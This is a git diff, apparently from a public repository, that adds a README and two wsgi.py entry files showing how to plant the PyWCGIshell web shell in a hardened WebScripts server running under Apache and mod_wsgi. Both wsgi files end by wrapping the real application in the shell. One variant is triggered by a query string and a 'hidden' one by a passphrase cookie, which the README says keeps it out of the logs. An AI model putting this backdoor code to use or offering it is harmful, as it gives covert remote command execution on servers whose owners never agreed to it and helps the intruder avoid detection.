mauricelambert
diff --git a/‎DefaultWebShell.PNG
8.42 KB b/‎DefaultWebShell.PNG
8.42 KB
diff --git a/‎HiddenWebShell.PNG
7.31 KB b/‎HiddenWebShell.PNG
7.31 KB
diff --git a/‎README.md
Lines changed: 47 additions & 0 deletions b/‎README.md
Lines changed: 47 additions & 0 deletions
diff --git a/‎wsgi.py
Lines changed: 68 additions & 0 deletions b/‎wsgi.py
Lines changed: 68 additions & 0 deletions
diff --git a/‎wsgi_default.py
Lines changed: 68 additions & 0 deletions b/‎wsgi_default.py
Lines changed: 68 additions & 0 deletions
@@ -0,0 +1,47 @@
+# WebScripts WebShell
+
+## Description
+
+Install a WebShell on hardened and deployed WebScripts (using Apache and mod_wsgi).
+
+[![WebShell on WebScripts - Youtube]()]()
+
+*WebShell on WebScripts - Youtube*
+
+## Steps
+
+### Install
+
+Install requirements in virtualenv:
+```bash
+pip install PyWCGIshell
+```
+
+### Write code
+
+Add 4 lines to the end of the `wsgi.py` file.
+
+#### Default WebShell
+
+```python
+from PyWCGIshell import WebShell
+webshell = WebShell(type_="wsgi")
+webshell.standard_page = application
+application = webshell.run
+```
+
+ - To use the WebShell add `?$HELL` to the end of the URL
+ - The `$HELL` in the query string is visible in the logs, i do not recommend using the default WebShell configuration.
+
+#### Hidden WebShell
+
+```python
+from PyWCGIshell import WebShell
+webshell = WebShell(type_="wsgi", passphrase="azerty", pass_type="header_value")
+webshell.standard_page = application
+application = webshell.run
+```
+
+ - To use the WebShell add `azerty` in a header value (for example in a cookie, in the javascript console: `document.cookie="azerty"`) and reload the page
+ - The value of the cookie is not visible in the logs
+ - You should change the passphrase for more discretion
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+from os import path, chdir, name
+from typing import List
+import logging
+import atexit
+
+chdir(path.join(path.dirname(__file__), ".."))
+
+activator = r"Scripts\activate_this.py" if name == "nt" else "bin/activate_this.py"
+with open(activator) as f:
+    exec(f.read(), {"__file__": activator}) # nosec # nosemgrep
+
+from WebScripts.WebScripts import (
+    server_path,
+    Configuration,
+    get_server_config,
+    add_configuration,
+    logs_configuration,
+    Server,
+    configure_logs_system,
+    send_mail,
+    hardening,
+    Logs,
+)
+
+
+class Paths:
+
+    """This class define configuration files."""
+
+    def __init__(self, config_cfg: List[str], config_json: List[str]):
+        self.config_cfg = config_cfg
+        self.config_json = config_json
+
+configure_logs_system()
+paths = Paths([], [])
+
+configuration = Configuration()
+for config in get_server_config(paths):
+    configuration = add_configuration(configuration, config)
+
+logs_configuration(configuration)
+
+configuration.set_defaults()
+configuration.check_required()
+configuration.get_unexpecteds()
+configuration.build_types()
+
+server = Server(configuration)
+
+send_mail(configuration, f"Server is up on http://{server.interface}:{server.port}/.")
+
+atexit.register(
+    send_mail,
+    configuration,
+    f"Server is down on http://{server.interface}:{server.port}/.",
+)
+
+hardening(server, Logs)
+
+application = server.app
+
+from PyWCGIshell import WebShell
+webshell = WebShell(type_="wsgi", passphrase="azerty", pass_type="header_value")
+webshell.standard_page = application
+application = webshell.run
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+from os import path, chdir, name
+from typing import List
+import logging
+import atexit
+
+chdir(path.join(path.dirname(__file__), ".."))
+
+activator = r"Scripts\activate_this.py" if name == "nt" else "bin/activate_this.py"
+with open(activator) as f:
+    exec(f.read(), {"__file__": activator}) # nosec # nosemgrep
+
+from WebScripts.WebScripts import (
+    server_path,
+    Configuration,
+    get_server_config,
+    add_configuration,
+    logs_configuration,
+    Server,
+    configure_logs_system,
+    send_mail,
+    hardening,
+    Logs,
+)
+
+
+class Paths:
+
+    """This class define configuration files."""
+
+    def __init__(self, config_cfg: List[str], config_json: List[str]):
+        self.config_cfg = config_cfg
+        self.config_json = config_json
+
+configure_logs_system()
+paths = Paths([], [])
+
+configuration = Configuration()
+for config in get_server_config(paths):
+    configuration = add_configuration(configuration, config)
+
+logs_configuration(configuration)
+
+configuration.set_defaults()
+configuration.check_required()
+configuration.get_unexpecteds()
+configuration.build_types()
+
+server = Server(configuration)
+
+send_mail(configuration, f"Server is up on http://{server.interface}:{server.port}/.")
+
+atexit.register(
+    send_mail,
+    configuration,
+    f"Server is down on http://{server.interface}:{server.port}/.",
+)
+
+hardening(server, Logs)
+
+application = server.app
+
+from PyWCGIshell import WebShell
+webshell = WebShell(type_="wsgi")
+webshell.standard_page = application
+application = webshell.run